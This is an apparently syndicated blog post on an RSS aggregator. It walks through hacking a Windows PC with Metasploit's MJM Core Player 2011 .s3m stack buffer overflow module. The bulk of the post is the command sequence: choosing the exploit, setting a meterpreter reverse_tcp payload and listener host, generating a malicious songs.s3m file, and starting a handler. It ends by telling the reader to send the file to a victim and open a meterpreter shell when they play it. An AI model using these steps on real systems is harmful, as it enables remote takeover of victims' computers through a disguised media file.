Quantcast
Channel: Hacking Articles|Raj Chandel's Blog
Viewing all articles
Browse latest Browse all 1812

Hack PC in Network using MJM Core Player 2011 .s3m Stack Buffer Overflow

$
0
0
This module exploits a stack buffer overflow in MJM Core Player 2011 when opening a malicious s3m file in this applications, a stack buffer overflow can be triggered, resulting in arbitrary code execution. This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.

Exploit Targets
Windows XP SP 3
MJM Core Player 2011
Windows 7

Requirement
Attacker: Kali Linux
Victim PC: Windows XP SP 3

Open Kali Linux terminal type msfconsole


Now type use exploit/windows/fileformat/mjm_coreplayer2011_s3m
msf exploit (mjm_coreplayer2011_s3m)>set payload windows/meterpreter/reverse_tcp
msf exploit (mjm_coreplayer2011_s3m)>set lhost 192.168.1.6 (IP of Local Host)
msf exploit (mjm_coreplayer2011_s3m)>exploit


After we successfully generate the malicious s3m File, it will stored on your local computer
/root/.msf4/local/songs.s3m


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.6
exploit

Now send your song.s3m files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.



Viewing all articles
Browse latest Browse all 1812

Trending Articles



<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>